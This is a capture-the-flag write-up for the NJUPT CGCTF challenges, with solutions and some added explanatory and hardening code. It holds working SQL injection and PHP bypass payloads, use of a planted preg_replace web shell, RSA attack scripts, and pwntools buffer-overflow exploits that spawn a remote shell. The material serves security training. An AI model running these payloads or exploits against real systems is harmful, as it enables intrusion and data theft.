CGCTF (NJUPT): https://cgctf.nuptsast.com/login
Web
Sign-in
View the page source.
nctf{flag_admiaanaaaaaaaaaaa}
md5 collision
PHP loose comparison: a hash that starts with 0e followed only by digits is treated as the number 0 when compared with ==, so any two such hashes "collide". md5("aabg7XSs") is one of them.
http://chinalover.sinaapp.com/web19/?a=aabg7XSs
nctf{md5_collision_is_easy}
Sign-in 2
Inspect the element in the browser and edit it.
nctf{follow_me_to_exploit}
This one is not Web
Download the image and open it in Notepad; the flag is appended at the end of the file.
nctf{photo_can_also_hid3_msg}
Layer by layer
View the source and follow src="SO.html", then src="S0.html", then src="SO.htm", src="S0.htm" and src="404.html"; the flag is in an HTML comment in the middle of that page.
nctf{this_is_a_fl4g}
AAencode
Switch the browser's character encoding to Unicode to display the encoded script, then paste it into the browser console to run it.
nctf{javascript_aaencode}
Single for twenty years
View the page source and open the link a href="./search_key.php" directly.
nctf{yougotit_script_now}
php decode
In the source, replace eval with printf so the decoded code is printed instead of executed.
Or write a Python script (gzinflate() is raw DEFLATE, so zlib needs negative wbits; the decoded code then subtracts 1 from every byte):
import base64
import zlib

a = "+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="

def gzinflate(data):
    # PHP gzinflate() decompresses a raw DEFLATE stream: -15 tells zlib to expect no header
    compressed_data = base64.b64decode(data)
    return zlib.decompress(compressed_data, -15)

a = gzinflate(a)
print(a)
b = ""
for byte in a:
    b += chr(byte - 1)
print(b)
nctf{gzip_base64_hhhhhh}
File inclusion
Read index.php through the php:// wrapper (php://filter/read=convert.base64-encode/resource=index.php),
then base64-decode the output to get
flag:nctf{edulcni_elif_lacol_si_siht}
Being single for a hundred years won't help either
Click the link while capturing with Burp and look at the response headers of the 302 redirect.
nctf{this_is_302_redirect}
Download~!
Visit http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw (the base64 of download.php) to download download.php.
It references hereiskey.php; download that the same way.
nctf{download_any_file_666}
COOKIE
Capture with Burp and change the cookie value to 1.
flag:nctf{cookie_is_different_from_session}
MYSQL
Since entering 1024 directly is blocked, the id to query is very likely 1024. intval() converts its argument to an integer, base 10 by default. So enter 1024.1: intval() turns "1024.1" into 1024, so the query runs with id=1024, while the check if ($_GET[id]==1024) compares 1024.1 with 1024 and fails, as required.
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1
nctf{query_in_mysql}
GBK Injection
Wide-byte injection: the input is escaped byte by byte, but the connection charset is GBK, so the 0xdf byte pairs with the backslash (0x5c) that the escaping inserts and forms one two-byte GBK character. The single quote that follows is left unescaped and closes the string.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2--+
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=0%df' union select 1,(SELECT+GROUP_CONCAT(flag+SEPARATOR+0x3c62723e)+FROM+gbksqli)--+
nctf{gbk_3sqli}
The ctf4 table holds flag{this_is_sqli_flag}.
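To show the byte-level mechanics behind the %df trick above, here is an added Python example (my own, not code from the writeup or the challenge). It models the byte-oriented escaping the vulnerable PHP performs, decodes the assembled query the way a GBK connection would, and contrasts it with escaping done only after the input has been validated in the connection charset. The query shape, the news table and the helper names are assumptions for illustration.

```python
# Added example: why "%df'" survives byte-oriented escaping on a GBK connection.
# The helpers are constructed stand-ins, not the challenge's PHP.

def addslashes(data: bytes) -> bytes:
    """Escape ' " \\ and NUL one byte at a time, the way PHP addslashes() or
    mysql_real_escape_string() under a single-byte charset does."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)

def build_query(user_input: bytes) -> bytes:
    """Vulnerable pattern: escape at the byte level, then concatenate."""
    return b"SELECT * FROM news WHERE id='" + addslashes(user_input) + b"'"

def as_mysql_sees_it(query: bytes, charset: str = "gbk") -> str:
    """MySQL parses the query in the connection charset. In GBK a lead byte
    0x81-0xFE followed by 0x5C (the backslash) is a single two-byte character,
    so the escaping backslash is swallowed into that character."""
    return query.decode(charset)

def ends_outside_literal(sql: str) -> bool:
    """True when the statement ends with every quoted literal properly closed."""
    in_str, i = False, 0
    while i < len(sql):
        c = sql[i]
        if in_str and c == "\\":   # escaped character inside a literal
            i += 2
            continue
        if c == "'":
            in_str = not in_str
        i += 1
    return not in_str

def escape_charset_aware(user_input: bytes, charset: str = "gbk") -> str:
    """Hardened variant: reject bytes that are not valid in the connection
    charset, then escape characters rather than bytes. (Prepared statements
    remain the real fix; this only closes the wide-byte hole.)"""
    try:
        text = user_input.decode(charset)   # strict: an orphan lead byte raises
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid %s" % charset) from exc
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def is_rejected(user_input: bytes) -> bool:
    """Helper for checking the hardened path: True if the input was refused."""
    try:
        escape_charset_aware(user_input)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    payload = b"1\xdf' or 1=1-- "    # what ?id=1%df%27%20or... arrives as (constructed)
    print(as_mysql_sees_it(build_query(payload)))
```

Run stand-alone it prints the query with one CJK character where the backslash used to be and a bare quote after it; the same payload without 0xdf keeps its backslash and stays inside the literal.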
/x00
Code audit: ereg() stops at a NUL byte, so %00 truncates the string it validates while the part after it still reaches the rest of the code; alternatively pass an array (nctf[]=), for which ereg() returns NULL rather than FALSE.
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%00%23biubiubiu3
or
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf[]=
Flag: nctf{use_00_to_jieduan}
bypass again
PHP loose comparison: md5() of an array returns NULL (with a warning), so two arrays compare equal.
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2
Flag: nctf{php_is_so_cool}
Variable overwrite
http://chinalover.sinaapp.com/web18/
POST data: pass=1&thepassword_123=1
nctf{bian_liang_fu_gai!}
PHP is the best language in the world
URL double encoding (the server decodes twice):
id=%25%36%38%25%36%31%25%36%33%25%36%62%25%34%34%25%34%61
which decodes once to %68%61%63%6b%44%4a and again to hackDJ.
nctf{php_is_best_language}
Impostor
Adding X-Forwarded-For: 127.0.0.1 to the request in Burp does not work;
you need Client-IP: 127.0.0.1.
nctf{happy_http_headers}
Header
Capture with Burp and read the response headers.
nctf{tips_often_hide_here}
Upload bypass
Capture with Burp and change the path to
/uploads/a.php%00 (URL-decode the %00 in Burp so a real NUL byte is sent)
flag:nctf{welcome_to_hacks_world}
SQL injection 1
Code audit; complete the query with
admin')#
flag:nctf{ni_ye_hui_sql?}
pass check
http://chinalover.sinaapp.com/web21/
POST data: pass[]= (strcmp() on an array returns NULL, which == 0 accepts)
flag:nctf{strcmp_is_n0t_3afe}
Naming is hard
Hexadecimal versus decimal comparison:
http://chinalover.sinaapp.com/web12/index.php?key=0xCCCCCCCCC
The flag is:nctf{follow_your_dream}
Password reset
Capture with Burp and change the user1 parameter to the base64 of admin, YWRtaW4=
POST /web13/index.php?user1=YWRtaW4= HTTP/1.1
POST data:
user=admin&newpass=123456&vcode=1234
flag is:nctf{reset_password_often_have_vuln}
PHP deserialization (not solved yet)
Congratulation! Here is my secret: thisisnctfsecret
SQL Injection
http://chinalover.sinaapp.com/web15/index.php?username=admin\&password=or 1 %23
The trailing backslash escapes the quote that should close the username literal, so the literal runs on up to the opening quote of the password; the password value or 1 then lands outside any quotes and # comments out the rest.
flag:nctf{sql_injection_is_interesting}
Comprehensive challenge
A Yujian (御劍) directory scan finds .bash_history, which shows zip -r flagbak.zip ./*
Download flagbak.zip and open it.
flag is:nctf{bash_history_means_what}
system (not solved yet)
SQL injection 2
Capture with Burp and change the body to user=' union select md5(1)#&pass=1
Logged in! Key: ntcf{union_select_is_wtf}
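To make visible what the backslash trick in SQL Injection and the union in SQL injection 2 do to the statement the server actually executes, here is an added Python helper (my own, not from the writeup). It walks a query the way MySQL treats single-quoted literals (backslash escapes, doubled quotes, # comments) and reports which text sits inside a literal and which is parsed as SQL. The login query shape and the users table are assumptions; the challenges' real queries are not shown on the page.

```python
# Added example: a small MySQL-style literal tokenizer for reasoning about injections.

def split_sql_strings(query: str):
    """Split a statement into ("sql", text), ("str", text) and ("comment", text)
    segments following MySQL rules for single-quoted literals: a backslash
    escapes the next character, '' is a literal quote, and # starts a comment."""
    segments, buf = [], []
    in_str, i, n = False, 0, len(query)
    while i < n:
        c = query[i]
        if in_str:
            if c == "\\" and i + 1 < n:            # escaped char stays in the literal
                buf.append(query[i:i + 2])
                i += 2
            elif c == "'" and i + 1 < n and query[i + 1] == "'":
                buf.append("''")                   # doubled quote inside the literal
                i += 2
            elif c == "'":                         # closing quote
                segments.append(("str", "".join(buf)))
                buf, in_str = [], False
                i += 1
            else:
                buf.append(c)
                i += 1
        else:
            if c == "'":                           # opening quote
                if buf:
                    segments.append(("sql", "".join(buf)))
                buf, in_str = [], True
                i += 1
            elif c == "#":                         # rest of the statement is a comment
                if buf:
                    segments.append(("sql", "".join(buf)))
                segments.append(("comment", query[i:]))
                return segments
            else:
                buf.append(c)
                i += 1
    if buf:
        segments.append(("str" if in_str else "sql", "".join(buf)))
    return segments

def executed_sql(query: str) -> str:
    """The text MySQL parses as SQL once literals and comments are removed."""
    return "".join(text for kind, text in split_sql_strings(query) if kind == "sql")

def literals(query: str):
    """The string literals MySQL sees (what the user controls in a safe query)."""
    return [text for kind, text in split_sql_strings(query) if kind == "str"]

def login_query(username: str, password: str) -> str:
    """Assumed shape of the vulnerable query behind the login challenges."""
    return "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password)

if __name__ == "__main__":
    for user, pw in [("admin\\", "or 1 #"), ("' union select md5(1)#", "1"), ("admin", "secret")]:
        print(executed_sql(login_query(user, pw)))
```

For the backslash payload the whole phrase ' AND password= ends up inside the username literal, so the only SQL left after username= is or 1; for the union payload the username literal is empty and union select md5(1) runs as SQL.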
Comprehensive challenge 2
Clicking the "about this CMS" link reveals a URL that looks like a file inclusion:
http://cms.nuptzj.cn/about.php?file=index.php does indeed display the source.
Download about.php, config.php, index.php, passencode.php, say.php and so.php in turn.
From about.php the admin entry point can be guessed as /loginxlcteam, but there is no password.
so.php is the script behind the search box.
It includes antiinject.php, which should be the anti-SQL-injection filter; download it too.
It strips sensitive words in a single pass, so writing them doubled (UNunionION) gets through: after the inner union is removed, UNION is left. It also strips spaces, which /**/ replaces.
First look at the search query:
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$id is not wrapped in quotes, so it can be injected directly.
Capture with Burp, set User-Agent: Xlcteam Browser as so.php requires, and POST this first to see which columns are echoed:
soid=0/**/UNunionION/**/SELselectECT/**/1,2,3,4
There are four columns; 2 and 3 are displayed.
The table structure is already known from the downloaded sources, so inject directly:
soid=0/**/UNunionION/**/SELselectECT/**/1,usernam=e,userpas=s,4/**/fro=m/**/admi=n
This returns the admin password:
102 117 99 107 114 117 110 116 117
passencode.php shows the password is stored as decimal ASCII codes, so decoding them gives the admin password:
fuckruntu
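To show why the doubled-keyword payloads above work and what the filter should have done, here is an added Python example (my own, not antiinject.php from the challenge). The blocked word list, the single-pass order (words first, then spaces and "=") and the stripping of "=" are assumptions reconstructed only from the payloads that succeeded; the real filter is not reproduced on this page. The example also decodes the decimal-ASCII password format from passencode.php.

```python
import re

# Assumed reconstruction of the filter, not the real antiinject.php.
BLOCKED_WORDS = ["union", "select", "from", "where", "admin", "username", "userpass"]
BLOCKED_CHARS = " ="

def antiinject_once(s: str) -> str:
    """Single-pass blacklist filter (the flawed design): every blocked word is
    removed once, case-insensitively, then blocked characters are dropped.
    Fragments left behind by a removal are never re-checked."""
    for word in BLOCKED_WORDS:
        s = re.sub(re.escape(word), "", s, flags=re.IGNORECASE)
    for ch in BLOCKED_CHARS:
        s = s.replace(ch, "")
    return s

def antiinject_fixpoint(s: str) -> str:
    """Repeat the pass until nothing changes, so removed fragments can't
    re-form a keyword (UNunionION -> UNION -> nothing)."""
    while True:
        stripped = antiinject_once(s)
        if stripped == s:
            return s
        s = stripped

def safe_query(message_id: str):
    """What so.php should have done instead of filtering: validate the id as an
    integer and bind it, returning (sql, params) for a DB-API cursor."""
    if not message_id.isdigit():
        raise ValueError("id must be numeric")
    return ("SELECT * FROM `message` WHERE display=1 AND id=%s", (int(message_id),))

def accepts_id(message_id: str) -> bool:
    try:
        safe_query(message_id)
        return True
    except ValueError:
        return False

def decode_passencode(codes: str) -> str:
    """Admin password as stored by passencode.php: space-separated decimal ASCII."""
    return "".join(chr(int(c)) for c in codes.split())

if __name__ == "__main__":
    payload = "0/**/UNunionION/**/SELselectECT/**/1,usernam=e,userpas=s,4/**/fro=m/**/admi=n"
    print(antiinject_once(payload))       # the injection reassembles itself
    print(antiinject_fixpoint(payload))   # nothing usable survives
    print(decode_passencode("102 117 99 107 114 117 110 116 117"))
```

The fixpoint loop only closes the specific hole the payload exploits; blacklists on an unquoted numeric id stay fragile, which is why the parameterised form is the one worth copying.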
Logging in to /loginxlcteam, the admin panel says xlcteam.php contains a one-line web shell; download its source first:
<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>
This is the three-argument array_walk callback backdoor: array_walk calls $e($value, $key, '') for the one element, so with www=preg_replace it runs preg_replace('|.*|e', $_POST['wtf'], ''), and the /e modifier evaluates the replacement string as PHP code.
Using the backdoor:
http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
POST data: wtf=print_r(scandir("."));
Output:
Array ( [0] => . [1] => .. [2] => about.php [3] => antiinject.php [4] => antixss.php [5] => config.php [6] => index.php [7] => list.php [8] => loginxlcteam [9] => passencode.php [10] => preview.php [11] => say.php [12] => sm.txt [13] => so.php [14] => xlcteam.php [15] => 鎭枩浣犺幏寰梖lag2.txt )
The last name is mojibake; switching the page encoding to Unicode shows it as 恭喜你獲得flag2.txt
Construct http://cms.nuptzj.cn/about.php?file=恭喜你獲得flag2.txt
flag:nctf{you_are_s0_g00d_hacker}
Password reset 2
The hint says vi exited abnormally and left its swap file behind:
http://nctf.nuptzj.cn/web14/.submit.php.swp
Code audit: a token of 0000000000 passes the check.
Capture with Burp and change the request to GET /web14/submit.php?emailAddress=admin%40nuptzj.cn&token=0000000000 HTTP/1.1
flag:nctf{thanks_to_cumt_bxs}
file_get_contents
Code audit of the source: file_get_contents() reads the whole file into a string and compares it.
Supply the "file" through the php:// wrapper instead, so the request body is what gets read:
http://chinalover.sinaapp.com/web23/?file=php://input
POST data: meizijiu
Variable overwrite
This one also involves $$ variable overwriting. $$ is a variable variable: it takes the value of an ordinary variable and uses it as a variable name. Passing ?name=meizijiu233, the foreach() assigns $key=name and $value=meizijiu233, and $$key=$value then means $name=meizijiu233.
http://chinalover.sinaapp.com/web24/?name=meizijiu233
nctf{AD3FBD8D5928693CA499347C91570AE6}
Attention!!
flag{zhaowomen}
HateIT
Anonymous
Crypto
easy!
base64 decode
nctf{this_is_base64_encode}
Keyboard
Look at the keyboard: each group of keys traces the shape of a letter.
nctf{areuhack}
Opposites attract
XOR the ciphertext with the known plaintext byte by byte; the result is the key, which is the flag. Python script:
#coding=utf-8
# read both files as bytes so the XOR works on raw values
with open("./密文.txt", "rb") as f:
    encrypted = f.read()
with open("./明文.txt", "rb") as f:
    plain = f.read()

flag = ""
for c, p in zip(encrypted, plain):
    flag += chr(c ^ p)
print(flag)
nctf{xor_xor_xor_biubiubiu}
Wiener Wiener Chicken Dinner
RSA Wiener attack: e is almost as large as N, which points to a small private exponent d, so the convergents of e/N are tried as candidates for k/d.
Decrypt with a Python script found online (Python 3; math.isqrt provides the integer square root):
import math

def continued_fractions_expansion(numerator, denominator):  # (e, N)
    """Partial quotients of numerator/denominator via Euclid's algorithm."""
    result = []
    divident = numerator % denominator
    quotient = numerator // denominator
    result.append(quotient)
    while divident != 0:
        numerator = numerator - quotient * denominator
        tmp = denominator
        denominator = numerator
        numerator = tmp
        divident = numerator % denominator
        quotient = numerator // denominator
        result.append(quotient)
    return result

def convergents(expansion):
    """Convergents k/d of the continued fraction, returned as (k, d) pairs."""
    convergents = [(expansion[0], 1)]
    for i in range(1, len(expansion)):
        numerator = 1
        denominator = expansion[i]
        for j in range(i - 1, -1, -1):
            numerator += expansion[j] * denominator
            if j == 0:
                break
            tmp = denominator
            denominator = numerator
            numerator = tmp
        convergents.append((numerator, denominator))  # (k, d)
    return convergents

def wiener_attack(cons, e, N):
    """Try each convergent as k/d; the right one yields an integer phi(N) whose
    quadratic x**2 - (N - phi + 1)*x + N has integer roots p and q."""
    for k, d in cons:
        if k == 0:
            continue
        if (e * d - 1) % k != 0:          # phi(N) must be an integer
            continue
        phi_N = (e * d - 1) // k
        a = 1
        b = -((N - phi_N) + 1)
        c = N
        delta = b * b - 4 * a * c
        if delta <= 0:
            continue
        root = math.isqrt(delta)
        if root * root != delta:          # p - q must be an integer
            continue
        x1 = (root - b) // (2 * a)
        x2 = -(root + b) // (2 * a)
        if x1 * x2 == N:
            return [x1, x2, k, d]

N = 1063045321283844468344531168992778520651192162100948533991539097447031440090068191835838938460807260866872379834796862916118785271062209281267667069640000501698142693389209275376843382863579650119977059768375028586326490055087394631528241983631462471709913758728591459476799115050977493979613545056736162868049
e = 837165022918376318972691589160491375229372195625940137121740685432530132860541010174727630660292946071507342455170833392895060048564125597915757582027572284342507277083636059558106672685400173531425920294781499112027917632497954958437660357575400222692979844873372105801998210845285775146263117399191185379347
expansion = continued_fractions_expansion(e, N)
cons = convergents(expansion)
p, q, k, d = wiener_attack(cons, e, N)
print(p)
print(q)
print(k)
print(d)
d is recovered:
57899763801722261062891290503559835904571946557258761154422546104824094670843
Plug it into the original encryption script:
#coding:utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import base64

# flag = input('flag:')
n = 1063045321283844468344531168992778520651192162100948533991539097447031440090068191835838938460807260866872379834796862916118785271062209281267667069640000501698142693389209275376843382863579650119977059768375028586326490055087394631528241983631462471709913758728591459476799115050977493979613545056736162868049
e = 837165022918376318972691589160491375229372195625940137121740685432530132860541010174727630660292946071507342455170833392895060048564125597915757582027572284342507277083636059558106672685400173531425920294781499112027917632497954958437660357575400222692979844873372105801998210845285775146263117399191185379347
d = 57899763801722261062891290503559835904571946557258761154422546104824094670843
key = RSA.construct((n, e, d))   # private key from the recovered d
cipher = Cipher_pkcs1_v1_5.new(key)
# cipher_text = base64.b64encode(cipher.encrypt(flag))
# print(cipher_text)
cipher_text = 'AGgt1h6dudnkeoCr7SFclkYYsYa65KZ8V29bbgbf+BDyjnyx5stCYjcyktat73aHs2EOaMgwGUwj3HwPTvT+T5LHIxM4uTnAgWOui4dnb7vF7QizN0ShY2O1h26CgLnf5I0vQWbY7WCC7kA/orNW7F5yxZiKRAawacS2M5ghP4/Q'
# the second argument is the sentinel returned if the PKCS#1 v1.5 padding is invalid
text = cipher.decrypt(base64.b64decode(cipher_text), None)
print(text)
Running it gives the flag:
flag{nell_anima_ritrovo_la_speranza_che_nel_corpo_stanco_ormai}
Baby RSA
Factor n with msieve:
msieve153.exe 0x291733BAB061EF9C599139CB3E40A5C762B6F448FFFFFFFFFFFFFF -v
giving
p1=1578173871764844869716052171
p2=10710927547195113973175047066215146269
With p1, p2, n and e known, compute d and decrypt to get the flag.
Python script:
p1 = 1578173871764844869716052171
p2 = 10710927547195113973175047066215146269
n = 0x291733BAB061EF9C599139CB3E40A5C762B6F448FFFFFFFFFFFFFF
e = 0x10001
assert p1 * p2 == n                 # sanity-check the factorisation
phi_n = (p1 - 1) * (p2 - 1)
d = pow(e, -1, phi_n)               # modular inverse (Python 3.8+); gmpy2.invert(e, phi_n) is equivalent
print(hex(d))
c = 0x237200C0F72B97DB55BA37C7AACBB61A26A0CB47D294726259C4DF
m = pow(c, d, n)
m_str = m.to_bytes((m.bit_length() + 7) // 8, "big").decode()
print(m_str)
The easy way:
rsa-tool 2 by te!: enter the numbers and it gives the answer directly.
flag{Acdxvf5vD_15_W7f}
Classical
Ciphertext
nk gqsanez h yhxe ulj dklapdn e xhoaeu loylpneawyiyw
The challenge says it is a classical cipher, so try every Caesar shift:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import string

a = 'nk gqsanez h yhxe ulj dklapdn e xhoaeu loylpneawyiyw'
lowercase = string.ascii_lowercase

def substitution(text, key_table):
    """Map each lowercase letter through key_table; leave other characters alone."""
    text = text.lower()
    result = ''
    for l in text:
        i = lowercase.find(l)
        if i < 0:
            result += l
        else:
            result += key_table[i]
    return result

def caesar_cypher_encrypt(text, shift):
    key_table = lowercase[shift:] + lowercase[:shift]
    return substitution(text, key_table)

def caesar_cypher_decrypt(text, shift):
    return caesar_cypher_encrypt(text, -shift)

for i in range(26):   # all 26 shifts (0 is the identity)
    print(i, caesar_cypher_decrypt(a, i))
RSA EASY
Misc
丘比龍De女神 (Cupid's Goddess)
Renaming the file to .zip does not make it open.
Try the simple things first: binwalk reports an incomplete zip. Open the file in 010 Editor and find nvshen.jpg; just above it is the word love. I was stuck here and looked up a writeup: replace love with PK, i.e. 50 4B 03 04, the zip local file header signature (50 4B 05 06 is the end-of-central-directory record). Save the zip part out on its own, and the archive opens with love as the password.
Zip file header 50 4B 03 04, trailer 50 4B 05 06.
The md5 of the file is the flag:
flag{a6caad3aaafa11b6d5ed583bef4d8a54}
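The header repair described above can be done without a hex editor. Here is an added Python example (my own, not code from the writeup): it finds the overwritten local-file-header signature, restores 50 4B 03 04, cuts from there to the end of the end-of-central-directory record, and verifies the result with zipfile. The sample blob is constructed inline (a zip whose first four bytes were replaced by "love", appended to some JPEG-like filler); the challenge's own archive was also password-protected, which zipfile handles with pwd=b"love" when reading.

```python
import hashlib
import io
import zipfile

ZIP_LOCAL_HDR = b"PK\x03\x04"   # 50 4B 03 04: local file header signature
ZIP_EOCD = b"PK\x05\x06"        # 50 4B 05 06: end of central directory record

def carve_zip(blob: bytes, damaged_sig: bytes = b"love") -> bytes:
    """Restore a zip whose first signature was overwritten with `damaged_sig`
    and return just the archive bytes, header through EOCD (plus any comment)."""
    start = blob.find(damaged_sig)
    if start < 0:
        raise ValueError("damaged signature not found")
    eocd = blob.rfind(ZIP_EOCD)
    if eocd < start:
        raise ValueError("no end-of-central-directory record after the header")
    # EOCD is 22 bytes; the last two hold the length of an optional comment
    comment_len = int.from_bytes(blob[eocd + 20:eocd + 22], "little")
    end = eocd + 22 + comment_len
    return ZIP_LOCAL_HDR + blob[start + len(damaged_sig):end]

def verify_and_hash(zip_bytes: bytes):
    """Return (member names, first bad member or None, md5 of the archive)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        bad = zf.testzip()
    return names, bad, hashlib.md5(zip_bytes).hexdigest()

def read_member(zip_bytes: bytes, name: str, pwd: bytes = None) -> bytes:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(name, pwd=pwd)

def build_sample_blob() -> bytes:
    """Constructed stand-in for the challenge file: JPEG-like filler followed by
    a zip whose 'PK\\x03\\x04' was replaced with the word 'love'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("nvshen.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    archive = buf.getvalue()
    assert archive.startswith(ZIP_LOCAL_HDR)
    return b"\xff\xd8\xff\xe0JFIF" + b"\x11" * 100 + b"love" + archive[4:]

if __name__ == "__main__":
    carved = carve_zip(build_sample_blob())
    print(verify_and_hash(carved))
```

Cutting exactly at the restored header matters: the central directory stores offsets relative to the start of the archive, so leaving filler in front of it would break extraction even with a correct signature.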
Reverse
Hello,RE!
Open the binary in IDA and press A on the data to convert it to strings.
Read left to right they join up as galfleW{emoc_oT_W_ERdlro}!
which makes little sense,
but each four-byte group is a little-endian dword, so reading every group backwards
gives the flag.
Python script:
v5 = 'galf'
v6 = 'leW{'
v7 = 'emoc'
v8 = '_oT_'
v9 = 'W_ER'
v10 = 'dlro'
v11 = '}!'
print(v5[::-1] + v6[::-1] + v7[::-1] + v8[::-1] + v9[::-1] + v10[::-1] + v11[::-1])
flag{Welcome_To_RE_World!}
ReadAsm2
Download and analyse the listing. The first column (4004e6) is the instruction's virtual address, the second (55 ...) the machine-code bytes.
00000000004004e6 <func>:
  4004e6: 55                      push   rbp                          ; save caller's frame pointer
  4004e7: 48 89 e5                mov    rbp,rsp                      ; set up this function's frame
  4004ea: 48 89 7d e8             mov    QWORD PTR [rbp-0x18],rdi     ; [rbp-0x18] = input (first argument, the buffer)
  4004ee: 89 75 e4                mov    DWORD PTR [rbp-0x1c],esi     ; [rbp-0x1c] = len (second argument, 28)
  4004f1: c7 45 fc 01 00 00 00    mov    DWORD PTR [rbp-0x4],0x1      ; i = 1
  4004f8: eb 28                   jmp    400522 <func+0x3c>           ; jump to the loop condition
  4004fa: 8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]      ; eax = i
  4004fd: 48 63 d0                movsxd rdx,eax                      ; rdx = (int64) i
  400500: 48 8b 45 e8             mov    rax,QWORD PTR [rbp-0x18]     ; rax = input
  400504: 48 01 d0                add    rax,rdx                      ; rax = &input[i]   (destination)
  400507: 8b 55 fc                mov    edx,DWORD PTR [rbp-0x4]      ; edx = i
  40050a: 48 63 ca                movsxd rcx,edx                      ; rcx = (int64) i
  40050d: 48 8b 55 e8             mov    rdx,QWORD PTR [rbp-0x18]     ; rdx = input
  400511: 48 01 ca                add    rdx,rcx                      ; rdx = &input[i]   (source)
  400514: 0f b6 0a                movzx  ecx,BYTE PTR [rdx]           ; ecx = input[i], zero-extended
  400517: 8b 55 fc                mov    edx,DWORD PTR [rbp-0x4]      ; edx = i
  40051a: 31 ca                   xor    edx,ecx                      ; edx = i ^ input[i]
  40051c: 88 10                   mov    BYTE PTR [rax],dl            ; input[i] = (byte) edx
  40051e: 83 45 fc 01             add    DWORD PTR [rbp-0x4],0x1      ; i++
  400522: 8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]      ; eax = i
  400525: 3b 45 e4                cmp    eax,DWORD PTR [rbp-0x1c]     ; compare i with len
  400528: 7e d0                   jle    4004fa <func+0x14>           ; if i <= len, loop again
  40052a: 90                      nop
  40052b: 5d                      pop    rbp                          ; restore caller's frame pointer
  40052c: c3                      ret
So func(input, len) is simply: for (i = 1; i <= len; i++) input[i] ^= i; with main passing len = 28. XOR is its own inverse, so applying the same loop to the stored bytes recovers the text.
Python script to solve it:
# bytes of the buffer that main hands to func, copied from the binary;
# each element is XORed with its 1-based position, matching input[i] ^= i
data = [0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d, 0x55, 0x6a, 0x7f, 0x60, 0x51,
        0x66, 0x63, 0x4e, 0x66, 0x7b, 0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66, 0x1c]
flag = ""
for i in range(1, 28):
    flag = flag + chr(data[i - 1] ^ i)
print(flag)
which gives the flag
flag{read_asm_is_the_basic}
Pwn
When did you born?
# -*- coding:utf-8 -*-
from pwn import *

p = remote("ctf.acdxvfsvd.net", 1926)
# The name is read with gets(), so it overflows into the birth-year variable
# stored right after the 8-byte name buffer. The year can't be entered as 1926
# directly, so answer 1927 and then overwrite the variable through the overflow.
payload = b"a" * 8 + p64(1926)
p.recvuntil(b"What's Your Birth?")
p.sendline(b"1927")
p.recvuntil(b"What's Your Name?")
p.sendline(payload)
p.interactive()
flag{gets_is_dangerous_+1s}
Stack Overflow
# -*- coding:utf-8 -*-
from pwn import *

p = remote('182.254.217.142', 10001)
elf = ELF('./cgpwna')
sysadr = elf.symbols['system']   # address of system() in the non-PIE binary

# Step 1: leave a message; the overflow plants '/bin/sh' in .bss
p.recvuntil(b'your choice:\n')
p.sendline(b'1')
payload1 = b'A' * 40 + p32(0x80) + b'/bin/sh'
p.recvuntil(b'you can leave some message here:\n')
p.sendline(payload1)

# Step 2: overflow the name buffer: padding up to the saved return address,
# then system(), a throwaway return address, and the address of '/bin/sh' in .bss
payload2 = b'A' * (0x30 + 0x4) + p32(sysadr) + p32(0xDEADBEEF) + p32(0x0804A0AD)
p.recvuntil(b'your name please:\n')
p.sendline(payload2)
p.interactive()
flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}